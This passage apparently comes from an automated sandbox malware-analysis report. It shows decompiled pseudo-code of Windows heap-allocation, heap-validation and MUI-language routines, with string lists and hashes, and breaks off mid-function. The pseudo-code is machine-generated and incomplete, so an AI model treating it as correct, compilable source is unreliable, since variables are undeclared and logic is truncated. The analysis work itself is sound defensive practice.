                                                                                                            • Instruction Fuzzy Hash: 1342DE71608742DFD715EF28C884A6ABBE5BF98204F0489AEF4C68B752DB34D981CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E01122D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				signed int _t83;
                                                                                                            				signed char _t89;
                                                                                                            				intOrPtr _t90;
                                                                                                            				signed char _t101;
                                                                                                            				signed int _t102;
                                                                                                            				intOrPtr _t104;
                                                                                                            				signed int _t105;
                                                                                                            				signed int _t106;
                                                                                                            				intOrPtr _t108;
                                                                                                            				intOrPtr _t112;
                                                                                                            				short* _t130;
                                                                                                            				short _t131;
                                                                                                            				signed int _t148;
                                                                                                            				intOrPtr _t149;
                                                                                                            				signed int* _t154;
                                                                                                            				short* _t165;
                                                                                                            				signed int _t171;
                                                                                                            				void* _t182;
                                                                                                            
                                                                                                            				_push(0x44);
                                                                                                            				_push(0x1140e80);
                                                                                                            				E010BD0E8(__ebx, __edi, __esi);
                                                                                                            				_t177 = __edx;
                                                                                                            				_t181 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                                                                            				 *((char*)(_t182 - 0x1d)) = 0;
                                                                                                            				 *(_t182 - 0x24) = 0;
                                                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                            					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                                                            					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                                                                            					_t83 = E010640E1("RtlAllocateHeap");
                                                                                                            					__eflags = _t83;
                                                                                                            					if(_t83 == 0) {
                                                                                                            						L48:
                                                                                                            						 *(_t182 - 0x24) = 0;
                                                                                                            						L49:
                                                                                                            						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                                                                            						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                                                                            						E011230C4();
                                                                                                            						goto L50;
                                                                                                            					}
                                                                                                            					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                                                                            					 *(_t182 - 0x28) = _t89;
                                                                                                            					 *(_t182 - 0x3c) = _t89;
                                                                                                            					_t177 =  *(_t182 + 8);
                                                                                                            					__eflags = _t177;
                                                                                                            					if(_t177 == 0) {
                                                                                                            						_t171 = 1;
                                                                                                            						__eflags = 1;
                                                                                                            					} else {
                                                                                                            						_t171 = _t177;
                                                                                                            					}
                                                                                                            					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                                                                            					__eflags = _t148 - 0x10;
                                                                                                            					if(_t148 < 0x10) {
                                                                                                            						_t148 = 0x10;
                                                                                                            					}
                                                                                                            					_t149 = _t148 + 8;
                                                                                                            					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                                                                            					__eflags = _t149 - _t177;
                                                                                                            					if(_t149 < _t177) {
                                                                                                            						L44:
                                                                                                            						_t90 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t90 + 0xc);
                                                                                                            						if( *(_t90 + 0xc) == 0) {
                                                                                                            							_push("HEAP: ");
                                                                                                            							E0106B150();
                                                                                                            						} else {
                                                                                                            							E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            						}
                                                                                                            						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                                                                            						E0106B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                                                                            						goto L48;
                                                                                                            					} else {
                                                                                                            						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                                                                            						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                                                                            							goto L44;
                                                                                                            						}
                                                                                                            						__eflags = _t89 & 0x00000001;
                                                                                                            						if((_t89 & 0x00000001) != 0) {
                                                                                                            							_t178 =  *(_t182 - 0x28);
                                                                                                            						} else {
                                                                                                            							E0107EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                                                                            							 *((char*)(_t182 - 0x1d)) = 1;
                                                                                                            							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                                                                            							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                                                                            						}
                                                                                                            						E01124496(_t181, 0);
                                                                                                            						_t177 = L01084620(_t181, _t181, _t178,  *(_t182 + 8));
                                                                                                            						 *(_t182 - 0x24) = _t177;
                                                                                                            						_t173 = 1;
                                                                                                            						E011249A4(_t181);
                                                                                                            						__eflags = _t177;
                                                                                                            						if(_t177 == 0) {
                                                                                                            							goto L49;
                                                                                                            						} else {
                                                                                                            							_t177 = _t177 + 0xfffffff8;
                                                                                                            							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                                                                            							if( *((char*)(_t177 + 7)) == 5) {
                                                                                                            								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                                                                            								__eflags = _t177;
                                                                                                            							}
                                                                                                            							_t154 = _t177;
                                                                                                            							 *(_t182 - 0x40) = _t177;
                                                                                                            							__eflags =  *(_t181 + 0x4c);
                                                                                                            							if( *(_t181 + 0x4c) != 0) {
                                                                                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                                                            								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                                                                            								if(__eflags != 0) {
                                                                                                            									_push(_t154);
                                                                                                            									_t173 = _t177;
                                                                                                            									E0111FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							__eflags =  *(_t177 + 2) & 0x00000002;
                                                                                                            							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                                                                            								_t101 =  *(_t177 + 3);
                                                                                                            								 *(_t182 - 0x29) = _t101;
                                                                                                            								_t102 = _t101 & 0x000000ff;
                                                                                                            							} else {
                                                                                                            								_t130 = E01061F5B(_t177);
                                                                                                            								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                                                                            								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                                                                            								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                                                                            									 *_t130 = 0;
                                                                                                            								} else {
                                                                                                            									_t131 = E010916C7(1, _t173);
                                                                                                            									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                                                                            									 *_t165 = _t131;
                                                                                                            									_t130 = _t165;
                                                                                                            								}
                                                                                                            								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                                                                            							}
                                                                                                            							 *(_t182 - 0x34) = _t102;
                                                                                                            							 *(_t182 - 0x28) = _t102;
                                                                                                            							__eflags =  *(_t181 + 0x4c);
                                                                                                            							if( *(_t181 + 0x4c) != 0) {
                                                                                                            								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                                                                            								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                                                                            								__eflags =  *_t177;
                                                                                                            							}
                                                                                                            							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                                                                            							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                                                                            								__eflags = 0;
                                                                                                            								E01124496(_t181, 0);
                                                                                                            							}
                                                                                                            							__eflags =  *(_t182 - 0x24) -  *0x1156360; // 0x0
                                                                                                            							_t104 =  *[fs:0x30];
                                                                                                            							if(__eflags != 0) {
                                                                                                            								_t105 =  *(_t104 + 0x68);
                                                                                                            								 *(_t182 - 0x4c) = _t105;
                                                                                                            								__eflags = _t105 & 0x00000800;
                                                                                                            								if((_t105 & 0x00000800) == 0) {
                                                                                                            									goto L49;
                                                                                                            								}
                                                                                                            								_t106 =  *(_t182 - 0x34);
                                                                                                            								__eflags = _t106;
                                                                                                            								if(_t106 == 0) {
                                                                                                            									goto L49;
                                                                                                            								}
                                                                                                            								__eflags = _t106 -  *0x1156364; // 0x0
                                                                                                            								if(__eflags != 0) {
                                                                                                            									goto L49;
                                                                                                            								}
                                                                                                            								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1156366; // 0x0
                                                                                                            								if(__eflags != 0) {
                                                                                                            									goto L49;
                                                                                                            								}
                                                                                                            								_t108 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t108 + 0xc);
                                                                                                            								if( *(_t108 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_push(E0110D455(_t181,  *(_t182 - 0x28)));
                                                                                                            								_push( *(_t182 + 8));
                                                                                                            								E0106B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                                                                            								goto L34;
                                                                                                            							} else {
                                                                                                            								__eflags =  *(_t104 + 0xc);
                                                                                                            								if( *(_t104 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_push( *(_t182 + 8));
                                                                                                            								E0106B150("Just allocated block at %p for %Ix bytes\n",  *0x1156360);
                                                                                                            								L34:
                                                                                                            								_t112 =  *[fs:0x30];
                                                                                                            								__eflags =  *((char*)(_t112 + 2));
                                                                                                            								if( *((char*)(_t112 + 2)) != 0) {
                                                                                                            									 *0x1156378 = 1;
                                                                                                            									 *0x11560c0 = 0;
                                                                                                            									asm("int3");
                                                                                                            									 *0x1156378 = 0;
                                                                                                            								}
                                                                                                            								goto L49;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t181 =  *0x1155708; // 0x0
                                                                                                            					 *0x115b1e0(__ecx, __edx,  *(_t182 + 8));
                                                                                                            					 *_t181();
                                                                                                            					L50:
                                                                                                            					return E010BD130(0, _t177, _t181);
                                                                                                            				}
                                                                                                            			}






















                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                            • API String ID: 0-1745908468
                                                                                                            • Opcode ID: 4a604c40ad5792e3d3383f13759071a7a0e815afae0e4b24949ebcfe65964389
                                                                                                            • Instruction ID: 37dd5d7b419f4996bcb47a9fc5ae7e09145ed6cf62726be89293aa372624b244
                                                                                                            • Opcode Fuzzy Hash: 4a604c40ad5792e3d3383f13759071a7a0e815afae0e4b24949ebcfe65964389
                                                                                                            • Instruction Fuzzy Hash: D0915471A10661DFDB2EDFA8C440AEDBBF2FF49704F08801CE5959B251C73A98A2CB15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E01073D34(signed int* __ecx) {
                                                                                                            				signed int* _v8;
                                                                                                            				char _v12;
                                                                                                            				signed int* _v16;
                                                                                                            				signed int* _v20;
                                                                                                            				char _v24;
                                                                                                            				signed int _v28;
                                                                                                            				signed int _v32;
                                                                                                            				char _v36;
                                                                                                            				signed int _v40;
                                                                                                            				signed int _v44;
                                                                                                            				signed int* _v48;
                                                                                                            				signed int* _v52;
                                                                                                            				signed int _v56;
                                                                                                            				signed int _v60;
                                                                                                            				char _v68;
                                                                                                            				signed int _t140;
                                                                                                            				signed int _t161;
                                                                                                            				signed int* _t236;
                                                                                                            				signed int* _t242;
                                                                                                            				signed int* _t243;
                                                                                                            				signed int* _t244;
                                                                                                            				signed int* _t245;
                                                                                                            				signed int _t255;
                                                                                                            				void* _t257;
                                                                                                            				signed int _t260;
                                                                                                            				void* _t262;
                                                                                                            				signed int _t264;
                                                                                                            				void* _t267;
                                                                                                            				signed int _t275;
                                                                                                            				signed int* _t276;
                                                                                                            				short* _t277;
                                                                                                            				signed int* _t278;
                                                                                                            				signed int* _t279;
                                                                                                            				signed int* _t280;
                                                                                                            				short* _t281;
                                                                                                            				signed int* _t282;
                                                                                                            				short* _t283;
                                                                                                            				signed int* _t284;
                                                                                                            				void* _t285;
                                                                                                            
                                                                                                            				_v60 = _v60 | 0xffffffff;
                                                                                                            				_t280 = 0;
                                                                                                            				_t242 = __ecx;
                                                                                                            				_v52 = __ecx;
                                                                                                            				_v8 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_v40 = 0;
                                                                                                            				_v28 = 0;
                                                                                                            				_v32 = 0;
                                                                                                            				_v44 = 0;
                                                                                                            				_v56 = 0;
                                                                                                            				_t275 = 0;
                                                                                                            				_v16 = 0;
                                                                                                            				if(__ecx == 0) {
                                                                                                            					_t280 = 0xc000000d;
                                                                                                            					_t140 = 0;
                                                                                                            					L50:
                                                                                                            					 *_t242 =  *_t242 | 0x00000800;
                                                                                                            					_t242[0x13] = _t140;
                                                                                                            					_t242[0x16] = _v40;
                                                                                                            					_t242[0x18] = _v28;
                                                                                                            					_t242[0x14] = _v32;
                                                                                                            					_t242[0x17] = _t275;
                                                                                                            					_t242[0x15] = _v44;
                                                                                                            					_t242[0x11] = _v56;
                                                                                                            					_t242[0x12] = _v60;
                                                                                                            					return _t280;
                                                                                                            				}
                                                                                                            				if(E01071B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                            					_v56 = 1;
                                                                                                            					if(_v8 != 0) {
                                                                                                            						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                                            					}
                                                                                                            					_v8 = _t280;
                                                                                                            				}
                                                                                                            				if(E01071B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                                            					_v60 =  *_v8;
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                                            					_v8 = _t280;
                                                                                                            				}
                                                                                                            				if(E01071B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                            					L16:
                                                                                                            					if(E01071B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                            						L28:
                                                                                                            						if(E01071B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                                            							L46:
                                                                                                            							_t275 = _v16;
                                                                                                            							L47:
                                                                                                            							_t161 = 0;
                                                                                                            							L48:
                                                                                                            							if(_v8 != 0) {
                                                                                                            								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                                            							}
                                                                                                            							_t140 = _v20;
                                                                                                            							if(_t140 != 0) {
                                                                                                            								if(_t275 != 0) {
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                                            									_t275 = 0;
                                                                                                            									_v28 = 0;
                                                                                                            									_t140 = _v20;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							goto L50;
                                                                                                            						}
                                                                                                            						_t167 = _v12;
                                                                                                            						_t255 = _v12 + 4;
                                                                                                            						_v44 = _t255;
                                                                                                            						if(_t255 == 0) {
                                                                                                            							_t276 = _t280;
                                                                                                            							_v32 = _t280;
                                                                                                            						} else {
                                                                                                            							_t276 = L01084620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                                            							_t167 = _v12;
                                                                                                            							_v32 = _t276;
                                                                                                            						}
                                                                                                            						if(_t276 == 0) {
                                                                                                            							_v44 = _t280;
                                                                                                            							_t280 = 0xc0000017;
                                                                                                            							goto L46;
                                                                                                            						} else {
                                                                                                            							E010AF3E0(_t276, _v8, _t167);
                                                                                                            							_v48 = _t276;
                                                                                                            							_t277 = E010B1370(_t276, 0x1044e90);
                                                                                                            							_pop(_t257);
                                                                                                            							if(_t277 == 0) {
                                                                                                            								L38:
                                                                                                            								_t170 = _v48;
                                                                                                            								if( *_v48 != 0) {
                                                                                                            									E010ABB40(0,  &_v68, _t170);
                                                                                                            									if(L010743C0( &_v68,  &_v24) != 0) {
                                                                                                            										_t280 =  &(_t280[0]);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								if(_t280 == 0) {
                                                                                                            									_t280 = 0;
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                                            									_v44 = 0;
                                                                                                            									_v32 = 0;
                                                                                                            								} else {
                                                                                                            									_t280 = 0;
                                                                                                            								}
                                                                                                            								_t174 = _v8;
                                                                                                            								if(_v8 != 0) {
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                                            								}
                                                                                                            								_v8 = _t280;
                                                                                                            								goto L46;
                                                                                                            							}
                                                                                                            							_t243 = _v48;
                                                                                                            							do {
                                                                                                            								 *_t277 = 0;
                                                                                                            								_t278 = _t277 + 2;
                                                                                                            								E010ABB40(_t257,  &_v68, _t243);
                                                                                                            								if(L010743C0( &_v68,  &_v24) != 0) {
                                                                                                            									_t280 =  &(_t280[0]);
                                                                                                            								}
                                                                                                            								_t243 = _t278;
                                                                                                            								_t277 = E010B1370(_t278, 0x1044e90);
                                                                                                            								_pop(_t257);
                                                                                                            							} while (_t277 != 0);
                                                                                                            							_v48 = _t243;
                                                                                                            							_t242 = _v52;
                                                                                                            							goto L38;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t191 = _v12;
                                                                                                            					_t260 = _v12 + 4;
                                                                                                            					_v28 = _t260;
                                                                                                            					if(_t260 == 0) {
                                                                                                            						_t275 = _t280;
                                                                                                            						_v16 = _t280;
                                                                                                            					} else {
                                                                                                            						_t275 = L01084620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                                            						_t191 = _v12;
                                                                                                            						_v16 = _t275;
                                                                                                            					}
                                                                                                            					if(_t275 == 0) {
                                                                                                            						_v28 = _t280;
                                                                                                            						_t280 = 0xc0000017;
                                                                                                            						goto L47;
                                                                                                            					} else {
                                                                                                            						E010AF3E0(_t275, _v8, _t191);
                                                                                                            						_t285 = _t285 + 0xc;
                                                                                                            						_v48 = _t275;
                                                                                                            						_t279 = _t280;
                                                                                                            						_t281 = E010B1370(_v16, 0x1044e90);
                                                                                                            						_pop(_t262);
                                                                                                            						if(_t281 != 0) {
                                                                                                            							_t244 = _v48;
                                                                                                            							do {
                                                                                                            								 *_t281 = 0;
                                                                                                            								_t282 = _t281 + 2;
                                                                                                            								E010ABB40(_t262,  &_v68, _t244);
                                                                                                            								if(L010743C0( &_v68,  &_v24) != 0) {
                                                                                                            									_t279 =  &(_t279[0]);
                                                                                                            								}
                                                                                                            								_t244 = _t282;
                                                                                                            								_t281 = E010B1370(_t282, 0x1044e90);
                                                                                                            								_pop(_t262);
                                                                                                            							} while (_t281 != 0);
                                                                                                            							_v48 = _t244;
                                                                                                            							_t242 = _v52;
                                                                                                            						}
                                                                                                            						_t201 = _v48;
                                                                                                            						_t280 = 0;
                                                                                                            						if( *_v48 != 0) {
                                                                                                            							E010ABB40(_t262,  &_v68, _t201);
                                                                                                            							if(L010743C0( &_v68,  &_v24) != 0) {
                                                                                                            								_t279 =  &(_t279[0]);
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t279 == 0) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                                            							_v28 = _t280;
                                                                                                            							_v16 = _t280;
                                                                                                            						}
                                                                                                            						_t202 = _v8;
                                                                                                            						if(_v8 != 0) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                                            						}
                                                                                                            						_v8 = _t280;
                                                                                                            						goto L28;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t214 = _v12;
                                                                                                            				_t264 = _v12 + 4;
                                                                                                            				_v40 = _t264;
                                                                                                            				if(_t264 == 0) {
                                                                                                            					_v20 = _t280;
                                                                                                            				} else {
                                                                                                            					_t236 = L01084620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                                            					_t280 = _t236;
                                                                                                            					_v20 = _t236;
                                                                                                            					_t214 = _v12;
                                                                                                            				}
                                                                                                            				if(_t280 == 0) {
                                                                                                            					_t161 = 0;
                                                                                                            					_t280 = 0xc0000017;
                                                                                                            					_v40 = 0;
                                                                                                            					goto L48;
                                                                                                            				} else {
                                                                                                            					E010AF3E0(_t280, _v8, _t214);
                                                                                                            					_t285 = _t285 + 0xc;
                                                                                                            					_v48 = _t280;
                                                                                                            					_t283 = E010B1370(_t280, 0x1044e90);
                                                                                                            					_pop(_t267);
                                                                                                            					if(_t283 != 0) {
                                                                                                            						_t245 = _v48;
                                                                                                            						do {
                                                                                                            							 *_t283 = 0;
                                                                                                            							_t284 = _t283 + 2;
                                                                                                            							E010ABB40(_t267,  &_v68, _t245);
                                                                                                            							if(L010743C0( &_v68,  &_v24) != 0) {
                                                                                                            								_t275 = _t275 + 1;
                                                                                                            							}
                                                                                                            							_t245 = _t284;
                                                                                                            							_t283 = E010B1370(_t284, 0x1044e90);
                                                                                                            							_pop(_t267);
                                                                                                            						} while (_t283 != 0);
                                                                                                            						_v48 = _t245;
                                                                                                            						_t242 = _v52;
                                                                                                            					}
                                                                                                            					_t224 = _v48;
                                                                                                            					_t280 = 0;
                                                                                                            					if( *_v48 != 0) {
                                                                                                            						E010ABB40(_t267,  &_v68, _t224);
                                                                                                            						if(L010743C0( &_v68,  &_v24) != 0) {
                                                                                                            							_t275 = _t275 + 1;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(_t275 == 0) {
                                                                                                            						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                                            						_v40 = _t280;
                                                                                                            						_v20 = _t280;
                                                                                                            					}
                                                                                                            					_t225 = _v8;
                                                                                                            					if(_v8 != 0) {
                                                                                                            						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                                            					}
                                                                                                            					_v8 = _t280;
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x010c8264
                                                                                                            0x010c826c
                                                                                                            0x010c8280
                                                                                                            0x010c8282
                                                                                                            0x010c8282
                                                                                                            0x010c8289
                                                                                                            0x010c8290
                                                                                                            0x010c8293
                                                                                                            0x010c8294
                                                                                                            0x010c8298
                                                                                                            0x010c829b
                                                                                                            0x010c829b
                                                                                                            0x01073e35
                                                                                                            0x01073e38
                                                                                                            0x01073e3d
                                                                                                            0x01073e44
                                                                                                            0x01073e58
                                                                                                            0x010c82a3
                                                                                                            0x010c82a3
                                                                                                            0x01073e58
                                                                                                            0x01073e60
                                                                                                            0x01073e6f
                                                                                                            0x01073e74
                                                                                                            0x01073e77
                                                                                                            0x01073e77
                                                                                                            0x01073e7a
                                                                                                            0x01073e7f
                                                                                                            0x01073e8c
                                                                                                            0x01073e8c
                                                                                                            0x01073e91
                                                                                                            0x00000000
                                                                                                            0x01073e91

                                                                                                            Strings
                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 01073F70
                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 01073DC0
                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 01073E97
                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 01073D8C
                                                                                                            • WindowsExcludedProcs, xrefs: 01073D6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                            • API String ID: 0-258546922
                                                                                                            • Opcode ID: 2a62705567902f92d2c52683e640a89a6d7ebe3c2f55a6104ca3a2db110c4aa1
                                                                                                            • Instruction ID: 47acc0c02ab1ca79bf4f754041427d75e7bd60967eccadef217bb83d57c1b1e1
                                                                                                            • Opcode Fuzzy Hash: 2a62705567902f92d2c52683e640a89a6d7ebe3c2f55a6104ca3a2db110c4aa1
                                                                                                            • Instruction Fuzzy Hash: 9FF15FB2D00619EFDB11DF98C980AEEBBF9FF18650F15406AE585E7250E7709E01CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E010640E1(void* __edx) {
                                                                                                            				void* _t19;
                                                                                                            				void* _t29;
                                                                                                            
                                                                                                            				_t28 = _t19;
                                                                                                            				_t29 = __edx;
                                                                                                            				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                                                                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                                            						_push("HEAP: ");
                                                                                                            						E0106B150();
                                                                                                            					} else {
                                                                                                            						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            					}
                                                                                                            					E0106B150("Invalid heap signature for heap at %p", _t28);
                                                                                                            					if(_t29 != 0) {
                                                                                                            						E0106B150(", passed to %s", _t29);
                                                                                                            					}
                                                                                                            					_push("\n");
                                                                                                            					E0106B150();
                                                                                                            					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                            						 *0x1156378 = 1;
                                                                                                            						asm("int3");
                                                                                                            						 *0x1156378 = 0;
                                                                                                            					}
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				return 1;
                                                                                                            			}






                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                            • API String ID: 0-188067316
                                                                                                            • Opcode ID: c86297a80233bd282071506ef00a219f7db4b0a79f9abbedbf86e566d85ce8aa
                                                                                                            • Instruction ID: c2317bb1dfc2b7019aaab89b9bdae98faba03fd69bd611c512316c799f4c5b7e
                                                                                                            • Opcode Fuzzy Hash: c86297a80233bd282071506ef00a219f7db4b0a79f9abbedbf86e566d85ce8aa
                                                                                                            • Instruction Fuzzy Hash: 030128F7204641EFE3799769A44DF9BB7E8DB41F34F18407DF0898F6419EA59480CA50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 70%
                                                                                                            			E0108A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                                                                                            				void* _v5;
                                                                                                            				signed short _v12;
                                                                                                            				intOrPtr _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed short _v24;
                                                                                                            				signed short _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed short _v36;
                                                                                                            				signed int _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				signed short* _v52;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t131;
                                                                                                            				signed char _t134;
                                                                                                            				signed int _t138;
                                                                                                            				char _t141;
                                                                                                            				signed short _t142;
                                                                                                            				void* _t146;
                                                                                                            				signed short _t147;
                                                                                                            				intOrPtr* _t149;
                                                                                                            				intOrPtr _t156;
                                                                                                            				signed int _t167;
                                                                                                            				signed int _t168;
                                                                                                            				signed short* _t173;
                                                                                                            				signed short _t174;
                                                                                                            				intOrPtr* _t182;
                                                                                                            				signed short _t184;
                                                                                                            				intOrPtr* _t187;
                                                                                                            				intOrPtr _t197;
                                                                                                            				intOrPtr _t206;
                                                                                                            				intOrPtr _t210;
                                                                                                            				signed short _t211;
                                                                                                            				intOrPtr* _t212;
                                                                                                            				signed short _t214;
                                                                                                            				signed int _t216;
                                                                                                            				intOrPtr _t217;
                                                                                                            				signed char _t225;
                                                                                                            				signed short _t235;
                                                                                                            				signed int _t237;
                                                                                                            				intOrPtr* _t238;
                                                                                                            				signed int _t242;
                                                                                                            				unsigned int _t245;
                                                                                                            				signed int _t251;
                                                                                                            				intOrPtr* _t252;
                                                                                                            				signed int _t253;
                                                                                                            				intOrPtr* _t255;
                                                                                                            				signed int _t256;
                                                                                                            				void* _t257;
                                                                                                            				void* _t260;
                                                                                                            
                                                                                                            				_t256 = __edx;
                                                                                                            				_t206 = __ecx;
                                                                                                            				_t235 = _a4;
                                                                                                            				_v44 = __ecx;
                                                                                                            				_v24 = _t235;
                                                                                                            				if(_t235 == 0) {
                                                                                                            					L41:
                                                                                                            					return _t131;
                                                                                                            				}
